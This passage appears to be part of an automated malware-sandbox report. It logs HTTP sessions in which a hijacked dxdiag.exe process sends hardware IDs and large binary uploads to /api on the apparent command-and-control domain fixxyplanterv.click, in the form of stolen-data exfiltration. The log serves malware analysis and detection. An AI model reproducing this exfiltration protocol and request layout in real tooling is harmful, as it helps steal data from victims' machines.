                                                                                                    Data Ascii: tSPRzKKF+mdaJIIKoEIkPL6cMQY07QlgnUDa+nfrq/3/PZbY7o/xIA1hwUPjRDZ16tMXDy3rVSjcXp/uO+yqsK18n9/niPskDWeTDKVRLji4gTwJI+oDf59H1/x3+a/w9jffm6KF7mdaJKIatUkpOaSYNwEw6h4y0gHA8Gqr/ublK5jKrJu2IA4k2U2lSigytJ0kByDoAXuVRdn0e++i9/A/k97lgfkjC2qIAuMNbjKq025CB/wNfpEBzrliq6H
                                                                                                    2025-01-13 07:29:13 UTC276INData Raw: 35 57 36 77 74 59 73 46 47 47 47 47 2b 46 32 4c 54 75 38 6c 43 42 43 4f 64 68 41 4d 70 4e 62 6b 61 39 43 38 75 62 33 2b 58 7a 48 6c 66 65 46 39 69 41 59 63 6f 59 42 73 6b 67 6a 4f 5a 43 63 4d 52 51 6c 36 41 31 6a 6c 51 33 61 2b 6a 75 6c 35 76 66 74 66 4d 65 56 7a 59 58 67 4a 43 31 6e 6b 41 54 6a 44 57 34 79 70 4e 4e 75 51 68 69 6e 48 48 47 4d 51 74 37 6d 52 61 76 2b 36 63 74 38 6c 4d 50 6c 6b 76 55 78 43 57 6d 4e 48 4a 30 44 64 6d 48 67 77 57 52 51 64 50 68 4f 62 61 4d 50 6b 66 59 37 73 35 2f 70 74 53 72 66 6a 62 44 4d 74 6a 56 43 50 4d 46 4b 6f 46 45 38 4d 37 47 46 4e 55 55 59 32 53 6c 6b 6c 6b 62 42 38 47 7a 6b 35 72 36 31 4d 39 2b 4e 32 38 4c 2f 49 42 6c 31 6c 77 43 7a 52 47 34 4b 2f 4e 4d 75 51 6e 36 6e 4f 33 47 53 54 39 62 68 61 71 61 42 35 76 38 37
                                                                                                    Data Ascii: 5W6wtYsFGGGG+F2LTu8lCBCOdhAMpNbka9C8ub3+XzHlfeF9iAYcoYBskgjOZCcMRQl6A1jlQ3a+jul5vftfMeVzYXgJC1nkATjDW4ypNNuQhinHHGMQt7mRav+6ct8lMPlkvUxCWmNHJ0DdmHgwWRQdPhObaMPkfY7s5/ptSrfjbDMtjVCPMFKoFE8M7GFNUUY2SlklkbB8Gzk5r61M9+N28L/IBl1lwCzRG4K/NMuQn6nO3GST9bhaqaB5v87
                                                                                                    2025-01-13 07:29:13 UTC1369INData Raw: 32 63 64 39 0d 0a 6a 30 32 35 53 64 4c 78 62 49 63 73 52 67 2b 67 31 38 75 62 6d 74 57 54 4e 6d 36 4b 51 74 6e 39 43 49 34 49 66 73 55 55 74 49 37 48 55 43 44 77 42 2f 51 4e 30 69 31 44 76 79 58 7a 78 71 2f 62 69 4c 64 50 41 34 59 7a 34 49 42 51 6b 7a 30 32 73 41 33 59 4d 38 74 74 32 50 57 69 6e 46 6a 4c 45 41 65 54 30 64 65 57 68 35 75 52 78 75 4d 2f 76 68 4f 45 32 51 69 72 42 43 2b 4d 62 66 48 76 79 6c 79 64 43 66 72 64 63 4b 63 6b 53 68 71 63 70 39 4f 6a 70 74 53 72 66 6a 62 44 4d 74 6a 56 43 50 4d 46 4b 6f 46 45 38 4d 37 47 46 4e 55 55 59 32 53 42 31 6d 6b 54 57 35 7a 6e 46 72 65 54 79 66 4e 47 56 37 63 4b 75 48 6b 49 73 77 54 4c 74 41 7a 5a 31 36 74 4d 44 41 53 6a 70 43 57 53 4e 44 50 2f 77 66 65 36 68 34 4c 63 53 6c 4d 48 6c 77 72 68 6e 42 43 54 5a
                                                                                                    Data Ascii: 2cd9j025SdLxbIcsRg+g18ubmtWTNm6KQtn9CI4IfsUUtI7HUCDwB/QN0i1DvyXzxq/biLdPA4Yz4IBQkz02sA3YM8tt2PWinFjLEAeT0deWh5uRxuM/vhOE2QirBC+MbfHvylydCfrdcKckShqcp9OjptSrfjbDMtjVCPMFKoFE8M7GFNUUY2SB1mkTW5znFreTyfNGV7cKuHkIswTLtAzZ16tMDASjpCWSNDP/wfe6h4LcSlMHlwrhnBCTZ
                                                                                                    2025-01-13 07:29:13 UTC1369INData Raw: 6b 4c 6a 4c 51 34 42 53 66 78 48 6d 57 54 66 2b 2f 69 65 4f 57 6f 39 2b 4d 74 33 35 75 69 6a 62 5a 2f 4f 79 54 4a 54 5a 77 4e 62 69 33 79 79 33 59 33 4a 65 6b 41 64 59 70 51 6e 4e 42 31 37 4b 66 6d 35 53 75 51 6c 61 7a 43 38 47 64 61 4e 73 39 4e 70 31 4a 75 62 65 4c 42 62 56 64 31 73 46 34 67 67 77 2f 49 74 32 32 72 2f 71 4b 37 66 49 32 56 75 73 4b 78 4a 42 42 32 68 77 36 31 51 47 6b 4c 6a 4c 51 34 42 53 66 78 48 6d 57 54 44 76 2f 42 57 74 57 59 35 66 59 79 6b 64 4c 30 6b 37 5a 70 51 6d 76 42 56 5a 6f 44 5a 6e 57 4e 33 58 59 61 5a 72 39 4f 52 35 39 50 33 2f 42 74 2b 75 76 58 2b 7a 75 65 77 2f 4b 56 2b 57 67 73 55 71 42 4e 37 51 4d 6f 64 65 72 42 65 45 49 69 39 6b 34 71 7a 42 4f 4b 6f 69 69 38 39 71 4c 71 63 6f 61 56 39 4d 4b 75 64 55 77 6b 6b 30 33 37 41
                                                                                                    Data Ascii: kLjLQ4BSfxHmWTf+/ieOWo9+Mt35uijbZ/OyTJTZwNbi3yy3Y3JekAdYpQnNB17Kfm5SuQlazC8GdaNs9Np1JubeLBbVd1sF4ggw/It22r/qK7fI2VusKxJBB2hw61QGkLjLQ4BSfxHmWTDv/BWtWY5fYykdL0k7ZpQmvBVZoDZnWN3XYaZr9OR59P3/Bt+uvX+zuew/KV+WgsUqBN7QModerBeEIi9k4qzBOKoii89qLqcoaV9MKudUwkk037A


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.649728172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:13 UTC286OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=GCRSQKWBECOUZEBTXP7
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 12863
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:13 UTC12863OUTData Raw: 2d 2d 47 43 52 53 51 4b 57 42 45 43 4f 55 5a 45 42 54 58 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 47 43 52 53 51 4b 57 42 45 43 4f 55 5a 45 42 54 58 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 43 52 53 51 4b 57 42 45 43 4f 55 5a 45 42 54 58 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65
                                                                                                    Data Ascii: --GCRSQKWBECOUZEBTXP7Content-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--GCRSQKWBECOUZEBTXP7Content-Disposition: form-data; name="pid"2--GCRSQKWBECOUZEBTXP7Content-Disposition: form-data; name="lid"ZqchOa--ne
                                                                                                    2025-01-13 07:29:14 UTC1130INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=it75g1p2hg80i539dasrgp9i2e; expires=Fri, 09 May 2025 01:15:53 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rALwIWhAZ0mVIHp68ogMS643f3b2J2J1bl8DbNQFnr4zJTRpsHwPhDPBxXSKjGz5wyH1bEX9TX%2BdO5R%2BRQgoVRHLodOhdv1JZOarl0ZiSA%2Bs26RskmtV46%2FXDCvhSdIvnsuYuSCi"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013ac8ebba00ca0-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1464&rtt_var=568&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13807&delivery_rate=1893644&cwnd=239&unsent_bytes=0&cid=0d20e462d1a2de4a&ts=557&x=0"
                                                                                                    2025-01-13 07:29:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2025-01-13 07:29:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.649734172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:15 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=0B0BRVQPHOX7M5
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 15079
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:15 UTC15079OUTData Raw: 2d 2d 30 42 30 42 52 56 51 50 48 4f 58 37 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 30 42 30 42 52 56 51 50 48 4f 58 37 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 42 30 42 52 56 51 50 48 4f 58 37 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 30 42 30 42 52 56 51 50 48 4f
                                                                                                    Data Ascii: --0B0BRVQPHOX7M5Content-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--0B0BRVQPHOX7M5Content-Disposition: form-data; name="pid"2--0B0BRVQPHOX7M5Content-Disposition: form-data; name="lid"ZqchOa--new--0B0BRVQPHO
                                                                                                    2025-01-13 07:29:15 UTC1122INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=ott6bngj66rcifcvsq32s1gb2h; expires=Fri, 09 May 2025 01:15:54 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBQkF4c2Zrf5M8T7nCnbxRaKRRFC5KgP2vsHq7XMoAXTuX7Ve3IGjI6ov0BggZ08qQTbDKw4hEav1fSfor2CVsEqXUSHJJ1LrJwRQCjZkNne9MVc46NLOHCOCGdbvLEgPi9CZADb"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013ac95ffb843b3-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1595&rtt_var=614&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16018&delivery_rate=1759036&cwnd=203&unsent_bytes=0&cid=97fa643e86d2defa&ts=525&x=0"
                                                                                                    2025-01-13 07:29:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2025-01-13 07:29:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.649741172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:16 UTC277OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=6KL9F4AUEF
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 19913
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:16 UTC15331OUTData Raw: 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 36 4b 4c 39 46 34 41 55 45 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                    Data Ascii: --6KL9F4AUEFContent-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--6KL9F4AUEFContent-Disposition: form-data; name="pid"3--6KL9F4AUEFContent-Disposition: form-data; name="lid"ZqchOa--new--6KL9F4AUEFContent-Di
                                                                                                    2025-01-13 07:29:16 UTC4582OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e
                                                                                                    Data Ascii: 2+?2+?o?Mp5p_oI
                                                                                                    2025-01-13 07:29:16 UTC1131INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=e4v41foi1dmvfo2fce6sg39dp1; expires=Fri, 09 May 2025 01:15:55 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpHt%2FPUosvumAFWOS0QPQhjHuHvSeH53927%2BiTy%2FahMz4EpUSikNBPWy2c9MRPqyyDEFPXsEOacUpSzNxqiUlwyCU2bUTLHhM%2FJC3BAUQJQCxMvrZSET5DmgptcycF534imQLZKj"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013ac9d7b640f85-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1613&rtt_var=617&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=20870&delivery_rate=1754807&cwnd=204&unsent_bytes=0&cid=d92672dfd1494d46&ts=617&x=0"
                                                                                                    2025-01-13 07:29:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2025-01-13 07:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.649753172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:18 UTC280OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=HC6MUG7SIZ2ZMC
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 1208
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:18 UTC1208OUTData Raw: 2d 2d 48 43 36 4d 55 47 37 53 49 5a 32 5a 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 48 43 36 4d 55 47 37 53 49 5a 32 5a 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 43 36 4d 55 47 37 53 49 5a 32 5a 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 48 43 36 4d 55 47 37 53 49 5a
                                                                                                    Data Ascii: --HC6MUG7SIZ2ZMCContent-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--HC6MUG7SIZ2ZMCContent-Disposition: form-data; name="pid"1--HC6MUG7SIZ2ZMCContent-Disposition: form-data; name="lid"ZqchOa--new--HC6MUG7SIZ
                                                                                                    2025-01-13 07:29:18 UTC1126INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=9f85t0h5u8ce551o0odc5gec42; expires=Fri, 09 May 2025 01:15:57 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IhLUKLjPuiptFGqcQ7ONDTyvC9NLqhATnKmQG%2FSnqrVopPcOsWTHXJDQ7MMJdroqagWniwSfalv4Ao2kMxwrMR3RD724EXNyrOLKQeaJf0%2BDQNyvon5PTGBXpmiPJvY%2F7zcREXBQ"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013aca7d8177d24-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1802&rtt_var=677&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2124&delivery_rate=1620421&cwnd=193&unsent_bytes=0&cid=a50b57cb4b976d7f&ts=442&x=0"
                                                                                                    2025-01-13 07:29:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2025-01-13 07:29:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.649765172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:19 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=1T0PER0JZ2WX3
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 552115
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 31 54 30 50 45 52 30 4a 5a 32 57 58 33
                                                                                                    Data Ascii: --1T0PER0JZ2WX3Content-Disposition: form-data; name="hwid"976E25EBFC839FDD5EC6468C5C963249--1T0PER0JZ2WX3Content-Disposition: form-data; name="pid"1--1T0PER0JZ2WX3Content-Disposition: form-data; name="lid"ZqchOa--new--1T0PER0JZ2WX3
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: d6 9e e5 1a 36 46 3e 6e 1f 90 4c fb 55 e9 36 5c 29 f8 e9 2d 32 c2 65 43 c4 04 ee a7 d9 b9 1c cf a8 3f 59 b1 e6 fb 63 53 a5 1b 2c e7 74 9a 29 7e 49 61 97 7e f1 36 a9 b6 4a 68 2f 80 1b 13 bd 09 53 06 52 82 57 a3 9a ab 35 11 33 85 8d d0 e6 25 30 8b dc 1a 8d 22 76 b6 36 08 ab 9f 74 49 ca 2c 9a f6 cb 1a f5 a5 d4 3d 5c 39 f9 f9 04 48 4e 0f e3 52 9f 83 be 67 45 ba 0d 32 ee 81 05 ae fa 58 35 fa ac 24 f8 ce 2e e5 fc 3b c7 5a b7 d2 03 af 78 97 f4 ca c0 6b fe 4d c5 46 58 fe 34 df a6 a6 3c ba 4b 0b ae 0d d8 17 0d 31 d0 ac 99 a4 5a 9d 11 42 be 1d d8 fc 8d 32 25 81 67 f3 17 2e b0 9f 8f 75 4e 18 68 7e 53 ae 67 a3 1a b7 23 e6 7f 96 4d 79 a9 a4 94 d2 2a 3f 5b b6 83 a5 d0 ee fe 77 c7 19 49 e8 2b f7 39 ce 7a 6f 87 5e 4b 2d 0c 16 14 ff df ed 93 0b 57 98 13 87 95 a5 4c 40 72
                                                                                                    Data Ascii: 6F>nLU6\)-2eC?YcS,t)~Ia~6Jh/SRW53%0"v6tI,=\9HNRgE2X5$.;ZxkMFX4<K1ZB2%g.uNh~Sg#My*?[wI+9zo^K-WL@r
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: fa 42 5d 1f ab 3a 42 2b 36 9c 2d 19 1a d4 fa c2 f3 a4 02 71 20 24 66 fa fb d7 2c 0f e0 50 60 1f 11 d1 47 3c 6b 2c e1 21 d0 94 42 c5 3c dc 0e 0e 12 5c 18 63 7e 9c 0b fb 24 c7 b3 ed 96 fb cd 4e 1b 1a 11 7b e5 40 28 c4 4a 2a bf b1 d0 36 64 bc 88 25 2a 06 c7 68 b4 ee 91 b9 04 2c de ec f8 ce 1f 9e d6 ef fe 60 dc 5e bb 61 34 5d dc 6d fb dc d6 e3 ab c6 74 2d ab a5 f6 8d cf 90 86 0a 8d 8c 85 bb 07 59 2a d3 8c bc 2a ed 6a 7a 7d f4 f7 bc a0 79 e7 e9 a7 8e 69 4f 83 47 a4 c5 df 58 d9 fa 5a 6d d7 da 6c 5d 47 50 46 69 8d 9f c4 1d f7 bd 89 21 b5 c7 81 99 01 c5 08 37 0c 03 e2 da 89 52 dd e7 fa ec cd d7 92 ac 55 b0 a4 8b 5b 18 ba 8d 06 c3 92 00 04 06 fc 0b 68 82 93 69 1a f6 60 a9 a1 45 c5 55 1b fc aa fc bd be 04 91 7b 30 15 49 61 1d 40 0f b7 c0 55 e0 f6 2f 9a f6 4d 84 8a
                                                                                                    Data Ascii: B]:B+6-q $f,P`G<k,!B<\c~$N{@(J*6d%*h,`^a4]mt-Y**jz}yiOGXZml]GPFi!7RU[hi`EU{0Ia@U/M
